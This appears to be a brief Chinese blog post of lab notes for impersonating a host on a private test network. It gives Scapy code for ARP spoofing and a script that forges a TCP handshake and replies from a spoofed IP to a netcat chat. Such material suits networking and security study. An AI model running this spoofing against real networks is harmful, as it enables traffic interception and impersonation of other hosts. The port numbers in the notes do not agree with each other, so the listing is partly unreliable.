测试
Administrator 0 评论 5 阅读

测试

_ 
Kali B中的命令:
nc 192.168.222.17 20030 -k
# 聊天ip:192.168.222.17(伪装ip)
# 监听端口:20032
# 持续聊天:-k

 阶段二:实施 ARP 欺骗 (主机 A - 终端 1)
sudo scapy
在Scapy中:
victim_ip = "192.168.222.133"
ghost_ip = "192.168.222.17"
arp_pkt = ARP(op=2, pdst=victim_ip, psrc=ghost_ip)

print(f"开始 ARP 欺骗: {ghost_ip} is at My_MAC ...")
send(arp_pkt, loop=1, inter=1, verbose=0)

Kali A中的命令:

from scapy.all import *

# 配置参数
victim_ip = "192.168.222.133"  # nc方IP
ghost_ip = "192.168.222.17"    # 伪装IP
listen_port = 20037           # 监听端口

print(f"=== Scapy 被动回答方 ===\n监听端口: {listen_port}")
print(f"伪装IP: {ghost_ip}")
print("等待nc连接...\n" + "="*40)

# ====== 阶段一:等待SYN连接 ======
print("[被动] 等待nc的SYN连接请求...")
syn_packets = sniff(filter=f"tcp and dst host {ghost_ip} and dst port {listen_port} and tcp[tcpflags] & tcp-syn != 0", count=1, timeout=30)

syn_pkt = syn_packets[0]
src_port = syn_pkt[TCP].sport  # nc的源端口
initial_seq = 5000             # 我们的初始序列号

print(f"[被动] 收到来自 {victim_ip}:{src_port} 的SYN请求")
print(f"[被动] nc的序列号: {syn_pkt[TCP].seq}")

# ====== 阶段二:发送SYN-ACK响应 ======
# 发送SYN-ACK (第二次握手)
syn_ack = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=listen_port, dport=src_port, flags="SA", seq=initial_seq, ack=syn_pkt[TCP].seq + 1)
send(syn_ack)


# 初始化序列号变量
my_seq = initial_seq + 1      # SYN-ACK消耗了1个序列号
my_ack = syn_pkt[TCP].seq + 1

print(f"[状态] 我方seq={my_seq}, 我方ack={my_ack}")

# ====== 阶段四:等待nc询问并回复 ======
# 💬 第一轮:等待nc询问 -> Scapy回复
print("\n" + "="*40)
print("[对话] 等待nc的第一轮询问...")

# 监听nc的数据包
nc_data1 = sniff(filter=f"tcp and src host {victim_ip} and src port {src_port} and dst host {ghost_ip} and dst port {listen_port} and tcp[tcpflags] & tcp-push != 0", count=1, timeout=10)

nc_pkt1 = nc_data1[0]
question1 = nc_pkt1[Raw].load.decode('utf-8', errors='ignore').strip()
print(f"[对话] 收到nc询问: {question1}")
    
# 更新ACK号
data_len1 = len(nc_pkt1[Raw].load) if Raw in nc_pkt1 else 0
my_ack = nc_pkt1[TCP].seq + data_len1

# 发送ACK确认收到询问
ack_reply1 = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=listen_port, dport=src_port, flags="A", seq=my_seq, ack=my_ack)
send(ack_reply1)
print("[对话] 已发送ACK确认收到询问")
    
# Scapy回复第一条消息
reply1 = "Hello 17 I am A \n"
reply_pkt1 = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=listen_port, dport=src_port, flags="PA", seq=my_seq, ack=my_ack)/Raw(load=reply1)
send(reply_pkt1)
print(f"[对话] 已回复: {reply1.strip()}")
my_seq += len(reply1)  # 更新序列号

# 💬 第二轮:等待nc第二次询问 -> Scapy回复
print("\n[对话] 等待nc的第二轮询问...")

nc_data2 = sniff(filter=f"tcp and src host {victim_ip} and src port {src_port} and dst host {ghost_ip} and dst port {listen_port} and tcp[tcpflags] & tcp-push != 0", count=1, timeout=10)

nc_pkt2 = nc_data2[0]
question2 = nc_pkt2[Raw].load.decode('utf-8', errors='ignore').strip()
print(f"[对话] 收到nc第二次询问: {question2}")

# 更新ACK号
data_len2 = len(nc_pkt2[Raw].load) if Raw in nc_pkt2 else 0
my_ack = nc_pkt2[TCP].seq + data_len2
        
# 发送ACK确认
ack_reply2 = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=listen_port, dport=src_port, flags="A", seq=my_seq, ack=my_ack)
send(ack_reply2)
print("[对话] 已发送ACK确认第二次询问")
        
# Scapy回复第二条消息
reply2 = "FINE 17\n"
reply_pkt2 = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=listen_port, dport=src_port, flags="PA", seq=my_seq, ack=my_ack)/Raw(load=reply2)
send(reply_pkt2)
print(f"[对话] 已回复: {reply2.strip()}")
my_seq += len(reply2)

许可协议
本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。
Hello Halo 2026-01-03
AB的文档 2026-01-04

评论区